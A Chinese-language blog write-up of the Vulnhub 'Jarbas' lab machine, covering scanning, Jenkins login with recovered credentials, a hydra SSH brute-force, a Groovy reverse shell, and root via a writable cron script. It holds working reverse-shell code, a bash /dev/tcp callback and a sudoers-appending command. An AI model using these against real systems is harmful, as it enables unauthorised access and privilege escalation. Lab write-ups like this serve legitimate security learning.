Vulnhub Jarbas

Vulnhub Jarbas

0x01:端口扫描

主机发现

nmap -sn 192.168.231.0/24

image-20241107202849575

全端口详细扫描

nmap -sT -sC -sV -O -p- 192.168.231.134 -oA /root/scan

image-20241110193535311

发现有3个服务,22ssh,80http,3306mysql,8080http

接下来对http进行漏洞扫描

nmap --script=vuln -p80 192.168.231.134

image-20241107212607636

似乎有csrf和sql注入漏洞

0x02:web渗透

扫目录

dirsearch -u http://192.168.231.134

image-20241107213717707

dirsearch -u http://192.168.231.134:8080

image-20241110195515322

扫到一个access.html,我们访问一下

image-20241110185302570

image-20241110185411448

image-20241110185506210

image-20241110185552288

tiago:italia99
trindade:marianna
eder:vipsu

我们试试ssh

image-20241110190957526

行不通,还记得我们之前扫到了8080的http吗,他是一个登录框,用的是Jenkins,我们尝试登陆一下

image-20241110193737003

最后一个登陆进去了

image-20241110193836026

我们一个一个地看,看到了Build Executor Status

image-20241110194412969

发现他有一台叫做master的linux机器,我们点进去看看

image-20241110195620557

image-20241110201602174

说的是允许我们执行一些Groovy脚本语法

image-20241110202130985

用户名是jenkins,我们hydra爆破一下

hydra -l jenkins -P /usr/share/wordlists/rockyou.txt 192.168.231.134 -t 20 ssh -Vv

-l:用户名

-P:字典路径

-t:线程数

-Vv:输出详情信息

image-20241111081558582

发现爆不出来,我们尝试另一种方法

我们尝试使用这个终端反弹一个shell,直接google搜就行了https://blog.csdn.net/weixin_54227009/article/details/130805973,用这个cli插件反弹

String host="192.168.231.131";
int port=6666;
String cmd="/bin/bash";
//ProcessBuilder创建操作系统进程
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed())
{while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());
    while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try
{p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

image-20241111083510389

0x03:权限提升

首先创建一个好看点的bash

python -c 'import pty ;pty.spawn("/bin/bash");'

image-20241111104248790

先看常规sudo提权

sudo -l

image-20241111083710545

看看suid

find / -type f -perm -04000 -ls 2>/dev/null

-ls:以列表形式显示找到的文件的详细信息,包括权限、大小、修改时间等。

image-20241111084054421

基本上没有啥可以利用的

再看看作业表

cat /etc/crontab

image-20241111084223682

拿到可以利用的文件了,这里有一个作业表,我们尝试利用它提升权限

echo "echo 'jenkins ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers" >> /etc/script/CleaningScript.sh

image-20241111112826877

sudo /bin/bash

这个需要稍等以下,等他CronJob执行后才能运行

image-20241111113034650

拿到root权限,我们find查找flag

find / -type f -name "flag.txt" 2>/dev/null

image-20241111113257526

0x04:思考补足

看了师傅的wp后发现可以做出以下改动

1.刚开始端口扫描没有扫到8080端口,导致思路受限,以后一定要多扫几遍

2.web渗透呢,有些师傅用的是MSF,我这里也试了一下

image-20241111113848503

用第一个

把options配好,然后运行

image-20241111114337564

但是呢报错了

image-20241111114411542

按照他的提示改好就行了

image-20241111185318868

还有就是在jenkins创建新文件(写马),或者是修改文件

3.提权的话,可以在配置文件中修改来反弹shell提权

bash-4.2$ echo "/bin/bash -c 'bash -i >& /dev/tcp/192.168.231.131/8888 0>&1'" > /etc/script/CleaningScript.sh
posted @ 2024-11-13 18:23  kelec0ka  阅读(1)  评论(0编辑  收藏  举报